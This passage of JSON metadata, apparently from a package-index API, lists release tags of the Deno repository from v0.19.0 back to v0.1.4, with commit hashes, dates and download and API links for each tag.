arsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/h